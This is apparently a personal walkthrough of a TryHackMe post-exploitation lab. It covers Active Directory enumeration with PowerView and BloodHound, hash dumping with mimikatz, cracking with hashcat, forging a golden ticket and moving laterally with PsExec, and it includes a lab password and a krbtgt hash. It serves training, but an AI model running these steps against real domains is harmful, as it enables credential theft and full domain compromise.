Post-Exploitation Basics

Room Link: https://tryhackme.com/room/postexploit

Presteps for Lab

SharpHound Installation

SharpHound version on the box is too old for the current version of Bloodhound so I had to update it.

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git

scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd

Added this line to SharpHound.ps1 before transfering so I could run the command right away

Victim

powershell -ep bypass
.\SharpHound.ps1

BloodHound Installation

apt-get install bloodhound
neo4j console

Enumeration w/ Powerview

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Victim

Run below to be able to run PowerView commands.

powershell -ep bypass
. .\Downloads\PowerView.ps1

Enumerate the domain users.

Get-NetUser | select cn

Enumerate the domain groups.

Get-NetGroup -GroupName *admin*

Find Shared folders.

Invoke-ShareFinder

Get Operating systems on the network.

Get-NetComputer -fulldata | select operatingsystem

Enumeration w/ Bloodhound

Setup and get loot with Bloodhound.

Victim

powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Transfer Bloodhound results back to Kali. SCP can be used in this case

Kali

scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip
Password: P@$$W0rd

Mapping the network w/ BloodHound

bloodhound --no-sandbox

We can just drag the zip file to bloodhound to import it.

Find all Domain Admins

List all Kerberostable accounts

Dumping hashes w/ mimikatz

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Victim

cd Downloads && mimikatz.exe

Victim - Mimikatz

privilege::debug
lsadump::lsa /patch

Copy to Kali output back to Kali

Output only the hashes and remove all duplicates into a new file.

Kali

cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//'  | sort | uniq > hash.txt

Kali

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show

Golden Ticket Attacks w/ mimikatz

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Dump the krbtgt Hash

Victim

cd downloads && mimikatz.exe

This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket. Take note of what is outlined in red you'll need it to create the golden ticket.

Victim - Mimikatz

privilege::debug
lsadump::lsa /inject /name:krbtgt

Create a Golden Ticket

Victim - Mimikatz

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

Use the Golden Ticket to access other machine

This will open a new command prompt with elevated privileges to all machines.Access other Machines! - You will now have another command prompt with access to all other machines on the network.

Victim - Mimikatz

misc::cmd

This doesn't actually work. Because of how tryhackme is setup but you would then be able to access other machines. In the example below you'd need to find out what other machines exists to pull this off.

Victim

dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe

Enumeration w/ Server Manager

Kali

rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd

Open Active Directory